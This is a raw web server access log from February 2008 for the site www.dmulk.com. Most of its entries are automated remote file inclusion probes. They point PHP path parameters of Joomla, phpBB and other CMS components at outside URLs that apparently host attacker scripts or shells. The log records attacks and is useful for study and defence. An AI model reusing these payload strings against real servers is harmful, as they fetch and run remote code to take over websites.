198.137.202.13 - - [19/Feb/2008:06:59:16 -0800] "GET /logs/access_080122.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [19/Feb/2008:06:59:51 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.23 - - [19/Feb/2008:07:01:51 -0800] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:07:01:57 -0800] "GET //beacon/language/1/splash.lang.php?languagePath=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:07:01:57 -0800] "GET /logs//beacon/language/1/splash.lang.php?languagePath=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:07:01:58 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:07:01:58 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:07:02:04 -0800] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:07:02:04 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:07:02:18 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:07:02:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:07:03:30 -0800] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:07:04:04 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.188 - - [19/Feb/2008:07:04:42 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.188 - - [19/Feb/2008:07:04:46 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.188 - - [19/Feb/2008:07:04:47 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.150.44 - - [19/Feb/2008:07:05:02 -0800] "GET /index.php?go1=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.30.136 - - [19/Feb/2008:07:05:17 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.30.136 - - [19/Feb/2008:07:05:18 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:07:06:22 -0800] "GET /logs/access_080126.log/index2.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:07:06:35 -0800] "GET /logs/access.log/modules/tinycontent/admin/index.php?spaw_root=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:07:06:36 -0800] "GET /modules/tinycontent/admin/index.php?spaw_root=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:07:06:36 -0800] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:06:50 -0800] "GET /logs/access_071228.log//index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:06:50 -0800] "GET //index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:06:51 -0800] "GET /logs//index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:06:52 -0800] "GET /logs/access_080131.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:06:54 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:06:54 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.255.3.76 - - [19/Feb/2008:07:07:06 -0800] "GET //components/com_smf/smf.php=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.255.3.76 - - [19/Feb/2008:07:07:13 -0800] "GET /logs//components/com_smf/smf.php=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:07:13 -0800] "GET /logs/access_071228.log//index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:07:14 -0800] "GET //index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:07:14 -0800] "GET /logs//index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:07:07:30 -0800] "GET /logs/access_080126.log/index.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:07:36 -0800] "GET /logs/access_080118.log//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:07:36 -0800] "GET //performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:07:36 -0800] "GET /logs/access_071231.log//index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:07:37 -0800] "GET /logs//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:07:59 -0800] "GET /logs/access_080118.log//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:07:59 -0800] "GET //performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:07:59 -0800] "GET /logs//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:08:07 -0800] "GET /logs/access_071231.log//index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:07:08:39 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:08:56 -0800] "GET /logs/access_080111.log//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:09:03 -0800] "GET /logs/access_080111.log//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.19.169 - - [19/Feb/2008:07:09:08 -0800] "GET /funny/?M=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:09:12 -0800] "GET //index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:09:12 -0800] "GET /logs//index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:09:17 -0800] "GET /logs/access_080120.log//index.php/modules/xgallery/upgrade_album.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:09:38 -0800] "GET /logs/access_080120.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:07:09:40 -0800] "GET /logs/access_071228.log//?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:07:09:40 -0800] "GET //?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:07:09:40 -0800] "GET /logs//?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 35263 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:07:09:44 -0800] "GET /logs/access_071225.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:07:09:44 -0800] "GET //?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:07:09:45 -0800] "GET /logs//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 35263 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:07:10:04 -0800] "GET /logs/index.php?option=com_joomla-visites&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:07:10:04 -0800] "GET /index.php?option=com_joomla-visites&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:10:08 -0800] "GET /logs/access_080111.log//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:10:08 -0800] "GET //performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:10:08 -0800] "GET /logs//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [19/Feb/2008:07:10:23 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.209.206 - - [19/Feb/2008:07:10:25 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.206 - - [19/Feb/2008:07:10:27 -0800] "GET /presto/?M=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:10:31 -0800] "GET /logs/access_080118.log//performs.php/components/com_artlinks/artlinks.dispnew.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:07:10:38 -0800] "GET /logs/index.php?option=com_joomla-visites&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:07:10:38 -0800] "GET /index.php?option=com_joomla-visites&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
209.172.48.89 - - [19/Feb/2008:07:10:44 -0800] "GET /logs/access_071228.log//?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [19/Feb/2008:07:10:44 -0800] "GET //?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [19/Feb/2008:07:10:44 -0800] "GET /logs//?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 35263 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:07:10:56 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [19/Feb/2008:07:10:57 -0800] "GET /logs/access_071225.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [19/Feb/2008:07:10:57 -0800] "GET //?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [19/Feb/2008:07:10:58 -0800] "GET /logs//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 35263 "-" "libwww-perl/5.808" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:07:11:32 -0800] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.178.114.10 - - [19/Feb/2008:07:11:46 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lirik.biz/skins/bobbyzhuo/.debug/rox.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.178.114.10 - - [19/Feb/2008:07:11:46 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lirik.biz/skins/bobbyzhuo/.debug/rox.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.178.114.10 - - [19/Feb/2008:07:12:05 -0800] "GET /page.php?s=http://www.lirik.biz/skins/bobbyzhuo/.debug/rox.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
195.178.114.10 - - [19/Feb/2008:07:12:05 -0800] "GET /logs/page.php?s=http://www.lirik.biz/skins/bobbyzhuo/.debug/rox.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:07:12:06 -0800] "GET /logs/index.php?option=com_joomla-visites&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:07:12:06 -0800] "GET /index.php?option=com_joomla-visites&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:07:12:14 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:07:12:15 -0800] "GET /public_includes/pub_blocks/activecontent.php?http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:07:12:15 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:07:13:02 -0800] "GET /logs/access_071228.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:07:13:10 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.134 - - [19/Feb/2008:07:13:14 -0800] "GET /logs/access_080211.log/index.php?configFile=http://www.pucorp.t5.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.134 - - [19/Feb/2008:07:13:14 -0800] "GET /index.php?configFile=http://www.pucorp.t5.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.134 - - [19/Feb/2008:07:13:15 -0800] "GET /logs/index.php?configFile=http://www.pucorp.t5.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.48.89 - - [19/Feb/2008:07:13:33 -0800] "GET /logs/access_071228.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.241.10 - - [19/Feb/2008:07:14:28 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://2eat.com.au/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.129.167.70 - - [19/Feb/2008:07:14:39 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.172 - - [19/Feb/2008:07:14:40 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.204.202.91 - - [19/Feb/2008:07:15:33 -0800] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.202.91 - - [19/Feb/2008:07:15:33 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:07:15:47 -0800] "GET /logs/access_080211.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:07:15:48 -0800] "GET //?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:07:15:48 -0800] "GET /logs//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 35263 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:16:40 -0800] "GET /logs/access_080211.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:16:40 -0800] "GET /logs/access.log//phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:16:40 -0800] "GET //phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:16:41 -0800] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:16:41 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
